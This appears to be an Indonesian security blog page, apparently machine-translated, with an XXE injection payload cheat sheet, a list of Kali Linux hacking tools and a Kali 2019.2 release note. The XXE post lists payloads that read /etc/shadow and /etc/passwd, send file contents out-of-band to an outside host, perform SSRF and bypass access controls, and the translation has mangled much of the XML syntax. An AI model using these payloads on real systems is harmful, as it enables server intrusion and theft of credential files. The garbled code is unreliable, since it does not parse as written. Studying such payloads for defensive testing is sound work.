Wednesday, December 4, 2019

CARA ALAT SEO KURSUS KEAMANAN CYBER PEKERJAAN KONTAK








CARA ALAT SEO KURSUS KEAMANAN CYBER PEKERJAAN KONTAK


Entri Eksternal XML (Entitas Eksternal (XXE))

oleh Priyanshu Sahay

Lembar Cheat Payload Injeksi XXE

Entitas Eksternal XML (XXE) Daftar Muatan Injeksi

Dalam artikel ini, kami akan menjelaskan apa itu injeksi entitas eksternal XML, dan contoh umum mereka, menjelaskan bagaimana menemukan dan mengeksploitasi berbagai jenis injeksi XXE, dan merangkum cara mencegah serangan injeksi XXE.

Serangan XML dapat mencakup pengungkapan file lokal, yang mungkin berisi data sensitif seperti kata sandi atau data pengguna pribadi, menggunakan file: skema atau jalur relatif di pengidentifikasi sistem.

Karena serangan itu terjadi relatif terhadap aplikasi yang memproses dokumen XML, penyerang dapat menggunakan aplikasi tepercaya ini untuk berporos ke sistem internal lain, mungkin mengungkapkan konten internal lainnya melalui permintaan (http) atau meluncurkan serangan CSRF ke layanan internal yang tidak dilindungi.

Dalam beberapa situasi, pustaka prosesor XML yang rentan terhadap masalah korupsi memori sisi klien dapat dieksploitasi dengan mendereferensi URI berbahaya, mungkin memungkinkan eksekusi kode arbitrer di bawah akun aplikasi.

Serangan lain dapat mengakses sumber daya lokal yang mungkin tidak menghentikan pengembalian data, mungkin memengaruhi ketersediaan aplikasi jika terlalu banyak utas atau proses tidak dirilis.

Apa itu injeksi entitas eksternal XML?

Injeksi entitas eksternal XML (juga dikenal sebagai XXE) adalah kerentanan keamanan web yang memungkinkan penyerang mengganggu pemrosesan data XML aplikasi. Seringkali memungkinkan penyerang untuk melihat file pada sistem file server aplikasi, dan untuk berinteraksi dengan sistem backend atau eksternal yang dapat diakses oleh aplikasi itu sendiri.

Dalam beberapa situasi, penyerang dapat meningkatkan serangan XXE untuk mengkompromikan server yang mendasarinya atau infrastruktur backend lainnya, dengan memanfaatkan kerentanan XXE untuk melakukan serangan pemalsuan permintaan sisi-server (SSRF).

Ada berbagai jenis serangan XXE:

Memanfaatkan XXE untuk Mengambil File

Di mana entitas eksternal didefinisikan berisi konten file, dan dikembalikan sebagai respons aplikasi.

Memanfaatkan XXE untuk Melakukan Serangan SSRF

Di mana entitas eksternal ditentukan berdasarkan URL ke sistem back-end.

Mengeksploitasi Blind XXE Exfiltrate Data Out-of-Band

Di mana data sensitif ditransmisikan dari server aplikasi ke sistem yang dikendalikan oleh penyerang.

Memanfaatkan blind XXE untuk Mengambil Data Melalui Pesan Kesalahan

Di mana penyerang dapat memicu pesan kesalahan parsing yang berisi data sensitif.

XML External Entity (XXE) Muatan Injeksi adalah sebagai berikut-

XXE: Contoh XML Dasar

<! -? xml version = "1.0"? -> John Doe



XXE: Contoh Entitas

<! -? xml version = "1.0"? -> <! DOCTYPE ganti [<! ENTITY contoh "Doe">]> John & example;



XXE: Pengungkapan File

<! -? xml version = "1.0"? -> <! DOCTYPE ganti [<! ENTITY ent SYSTEM "file: /// etc / shadow">]> John & ent;



XXE: Contoh Penyertaan File Lokal

<! DOCTYPE foo [ <! ELEMENT foo (#ANY)> <! ENTITY xxe SYSTEM "file: /// etc / passwd">]> & xxe;



XXE: Contoh Penyertaan File Lokal Buta (Ketika case pertama tidak mengembalikan apa-apa).

<! DOCTYPE foo [ <! ELEMENT foo (#ANY)> <! ENTITY% xxe SYSTEM "file: /// etc / passwd"> <! ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]> & blind;



XXE: Akses Kontrol Bypass (Memuat Sumber Daya Terbatas - contoh PHP)

<! DOCTYPE foo [ <! ENTITY ac SYSTEM "php: //filter/read=convert.base64-encode/resource=http: //example.com/viewlog.php">]>



XXE: Contoh SSRF (Pemalsuan Permintaan Sisi Server)

<! DOCTYPE foo [ <! ELEMENT foo (#ANY)> <! ENTITY xxe SYSTEM "https://www.example.com/text.txt">]> & xxe;



XXE: (Serangan Jarak Jauh - Melalui Penyertaan Xml Eksternal) Contoh

<! DOCTYPE lolz [ <! SISTEM uji ENTITY "https://example.com/entity1.xml">]> 3..2..1...&test XXE: Contoh UTF-7 + ADwAIQ-DOCTYPE foo + AFs + ADwAIQ-ELEMENT foo SETIAP + AD4 + ADwAIQ-ENTITY xxe SYSTEM + ACI-http: //hack-r.be: 1337 + ACI + AD4AXQA + + ADw-foo + AD4AJg-xxe + ADsAPA- / foo + AD4 XXE: Base64 Dienkripsi <! Tes DOCTYPE [<! ENTITY% init SYSTEM "data: // text / plain; base64, ZmlsZTovLy9ldGMvcGFzc3dk">% init; ]>



XXE: XXE di dalam SOAP Contoh

<! [CDATA [<! DOCTYPE doc [<! ENTITY% dtd SYSTEM "http: // xxxx: 22 /">% dtd;]> ]]> </ sabun: Tubuh>



XXE: XXE di dalam SVG



Sunday, December 2, 2018

7 Alat Hacking Terbaik Untuk Kali Linux





7 Alat Hacking Terbaik Untuk Kali Linux

oleh Priyanshu Sahay
Di terjemahkan oleh ZaktiZarna
Anda mungkin pernah melihat banyak peretas di film-film Hollywood yang membuat peretasan menyenangkan dan dengan mudah mendapatkan akses ke komputer atau laptop apa pun.
Tapi, tidak mudah untuk masuk ke sistem apa pun di dunia nyata. Ada banyak orang yang tertarik dalam peretasan seperti film-film Hollywood dan Kali Linux adalah sistem operasi terbaik untuk melakukannya sesuai dengan banyak ahli.
Ada banyak alat peretas sumber terbuka yang dapat Anda gunakan untuk masuk ke komputer apa pun sesuai kebutuhan Anda.

Lihatlah daftar 7 alat peretas terbaik untuk Kali Linux yang tercantum di bawah ini:

🌟John the Ripper
   John the Ripper adalah alat peretasan yang sangat populer yang harus digunakan oleh pengguna Kali Linux. Ini adalah alat perengkahan yang digunakan dalam pengujian penetrasi. Dikembangkan oleh Unix Systems, alat ini memiliki banyak teknik peretasan seperti deteksi hash kata sandi otomatis, serangan brute force, cracker kustomisasi, dan serangan kamus
Paket ini mendukung jenis hash Unix crypt seperti berbasis DES tradisional, "bigcrypt", BSDI extended berbasis DES, FreeBSD MD5, dan OpenBSD Blowfish berbasis. Alat peretas kata sandi gratis ini berjalan pada lima belas platform yang berbeda sekarang. Selain itu, sangat mudah digunakan dan dioperasikan untuk memecahkan kata sandi. Anda juga dapat mencoba beberapa antivirus online terbaik dengan Penawaran Amazon yang akan memberi Anda harga bagus tahun ini.

🌟NMap (Network Mapper)
   NMap atau Network Mapper adalah alat open source yang tersedia secara gratis. Alat ini sangat populer di kalangan administrator jaringan yang menggunakannya untuk menemukan jaringan dan mengamankan jaringan. NMap sangat halus untuk digunakan dan didokumentasikan dengan sangat baik.

Administrator Jaringan menggunakan NMap untuk terus memeriksa host tunggal dan jaringan besar dan mendeteksi risiko keamanan. Alat ini mendukung fitur seperti transfer data dan GUI. Alat selanjutnya adalah alat pemindaian port yang berguna yang mengumpulkan informasi dengan mengirimkan paket ke port sistem.

🌟Kerangka Metasploit
     Platform berbasis Ruby ini digunakan untuk menguji eksploitasi terhadap host. Bukan hanya ini, tetapi Anda juga dapat mengembangkan dan mengeksekusi eksploitasi juga. Kerangka kerja Metasploit berisi pustaka besar alat yang dapat digunakan untuk pengujian penetrasi, mengeksploitasi kerentanan, menggunakan msfconsole untuk menemukan target, mengeksploitasi risiko keamanan dan banyak lagi. Dikatakan bahwa Metasploit Framework adalah salah satu alat keamanan paling kuat di pasar infosec.

🌟WireShark
    WireShark adalah alat sumber terbuka yang menganalisis paket dan tidak ada biaya. Ini adalah alat yang hebat untuk terus memeriksa aktivitas jaringan pada level yang sangat dalam. Tidak hanya ini, tetapi Anda juga dapat menggunakan WireShark untuk menangkap transfer paket langsung, browse dan filter juga.
WireShark sangat berguna untuk peretas (etis) yang memberikan fitur seperti akses file pcap, laporan yang dapat disesuaikan, peringatan, pemicu tingkat lanjut, dan banyak lagi. Itu sebabnya ini adalah penganalisa protokol jaringan yang paling banyak digunakan di dunia untuk Kali Linux.

   🌟 Kismet Wireless
Kismet Wireless adalah alat gratis yang digunakan sebagai sniffer nirkabel, Intrusion Detection System (IDS) , dan LAN analyzer. Alat ini kompatibel dengan banyak kartu nirkabel dan dapat digunakan untuk bekerja dengan jaringan nirkabel seperti 802.11a, 802.11b, 802.11g, dan 802.11n.

Alat Kismet WIreless memiliki kemampuan untuk berjalan dalam mode pasif, melakukan pendataan jaringan dan bertindak sebagai Sistem Deteksi Intrusi Nirkabel juga. Ini dapat dengan mudah memindai tingkat enkripsi nirkabel dan mendukung lompatan saluran. Anda dapat menjelajahi memesan beberapa antivirus online terbaik dunia dengan Penawaran Flipkart dengan harga diskon besar .

🌟Aircrack-ng
     Aircrack-ng adalah alat keamanan yang terdiri dari penganalisis paket, cracker jaringan, WPA / WPA2-PSK, dan lebih banyak alat penganalisa paket nirkabel. Alat paling populer yang termasuk dalam Aircrack-ng adalah Airmon-Ng, Aircrack-Ng, Aireplay-Ng, dan Airdecap-Ng.

Alat ini memberikan berbagai fitur seperti dukungan kata sandi WEP, WPA / WPA2-PSK, mengendus paket, memulihkan kata sandi kunci WEP dan membuat terowongan virtual.

🌟BeEF (Kerangka Eksploitasi Browser)
    Kerangka Eksploitasi Browser juga dikenal sebagai BeEF adalah alat penetrasi yang menemukan risiko dan kerentanan browser untuk mengeksploitasi host. Alat-alat ini benar-benar fokus pada sisi web - mulai dari serangan pada ponsel, klien desktop hingga menganalisis eksploitasi pada Mac dan Linux apa pun. Ini terdiri dari banyak fitur seperti web UI, kemampuan untuk menemukan plugin yang digunakan di browser, mengumpulkan sejarah dan mengintegrasikan Metasploit.

     Ini adalah beberapa alat yang dapat Anda gunakan untuk memeriksa jaringan, menganalisis risiko apa pun dalam jaringan, pengujian penetrasi, dan lainnya



Friday, October 5, 2018

FACE BEHIND THESCENE

UPDATE TERBARU kali LINUX 4.19.12



Linux , Sistem Operasi23 Mei 2019
Kali Linux 2019.2 Versi OS Dirilis
oleh Priyanshu Sahay
Kali Linux Versi BaruKali Linux Versi Baru


Tim keamanan ofensif telah merilis versi terbaru sistem operasi Kali Linux 2019.2.

Rilis ini membawa kernel kami ke versi 4.19.28, memperbaiki banyak bug, termasuk banyak paket yang diperbarui, dan yang paling menarik, fitur rilis baru Kali Linux NetHunter!

Kali Linux adalah sistem operasi distribusi Linux yang diturunkan dari Debian yang dirancang untuk forensik digital dan pengujian penetrasi .

Kali NetHunter 2019.2 Rilis
Berkat kontribusi tak kenal lelah dari komunitas NetHunter yang semarak dipimpin oleh re4son, binkybear, fattire, jcadduono, kimocoder, dan PaulWebSec, NetHunter sekarang mendukung lebih dari 50 perangkat yang menjalankan semua versi Android terbaru, dari KitKat hingga Pie.



Untuk merayakan tonggak sejarah ini, Kali merilis 13 gambar NetHunter baru untuk versi Android terbaru dari perangkat favorit kami, termasuk:

Nexus 6 menjalankan Pie
Nexus 6P, Oreo
OnePlus2, Pai
Galaxy Tab S4 LTE & WiFi, Oreo
Ini dan banyak lagi dapat diunduh dari halaman NetHunter . Jika Anda tidak dapat menemukan gambar untuk perangkat favorit Anda dan Anda tertarik untuk porting NetHunter, kami akan senang untuk Anda bergabung dengan komunitas kami dan memberikan celah. Informasi lebih lanjut dapat ditemukan di rumah baru kami di GitLab .


Kali Linux

@kalilinux
Today is the big day! Kali 2019.2 release!

Ready for download at https://offs.ec/2VEkr6v

This release has MAJOR NetHunter updates, 13 new images and new device support. Thanks to the NetHunter team for pushing this forward and @re4sonkernel for leading this effort.

2,107
11:18 PM - May 21, 2019
Twitter Ads info and privacy

Kali Linux 2019.2 Release
Welcome to our second release of 2019, Kali Linux 2019.2, which is available for immediate download. This release brings our kernel up to version 4.19.28, fixes numerous bugs, includes many updated...

kali.org
1,171 people are talking about this
Upgrade Alat
Rilis ini sebagian besar fitur berbagai perbaikan dan perbaikan bug tetapi masih ada banyak alat yang diperbarui termasuk seclists, msfpc, dan exe2hex.

Untuk daftar lengkap pembaruan, perbaikan, dan penambahan, silakan merujuk ke Kaliel Tracker Tracker Changelog .

Pembaruan ARM
Untuk pengguna ARM, ketahuilah bahwa boot pertama akan memakan waktu sedikit lebih lama dari biasanya, karena memerlukan instalasi ulang beberapa paket pada perangkat keras. Ini bermanifestasi sebagai manajer login macet beberapa kali sampai paket selesai menginstal ulang dan perilaku yang diharapkan.

Unduh Kali Linux 2019.2 OS

Jika Anda ingin melihat rilis Kali terbaru dan terhebat ini, Anda dapat menemukan tautan unduhan untuk ISO dan Torrents di halaman Unduhan Kali bersama dengan tautan ke mesin virtual Offensive Security dan gambar ARM, yang juga telah diperbarui ke 2019.2. Jika Anda sudah memiliki instalasi Kali yang Anda sukai, Anda dapat dengan mudah memutakhirkan di tempatnya sebagai berikut.

root @ kali : ~ # apt update && apt -y upgrade penuh


Memastikan Instalasi Anda Diperbarui

Untuk memeriksa versi Anda, pertama-tama pastikan repositori paket Kali Anda sudah benar.

root @ kali : ~ # cat /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling contrib non-free utama
Kemudian setelah menjalankan 'apt -y full-upgrade', Anda mungkin memerlukan 'reboot' sebelum memeriksa:

root @ kali : ~ # grep VERSION / etc / os-release
VERSION = "2019.2"
VERSION_ID = "2019.2"

root @ kali : ~ # uname -a
Linux kali 4.19.0-kali4-amd64 # 1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU / Linux


Untuk pembaruan terkini tentang Dunia Cyber ​​dan Infosec,

Subscribe now

Watshapp ;https://chat.whatsapp.com/H7zVxnQDtCQ2yeNJA3uBwL

Telegram ;https://telegram.me/ZZACOIN


Donations crypto currency

Btc : 3Qu6C8zPfNCsUPC2YXB5aNYW6XWF1LqDNn
Eth :0x5afe46f836a46fbe858aa34c2886a1741c2135c1
Doge:DCjZGvSPbyqVN29vKff9pEHKGoPDngYSGi

By ¤_ZZA~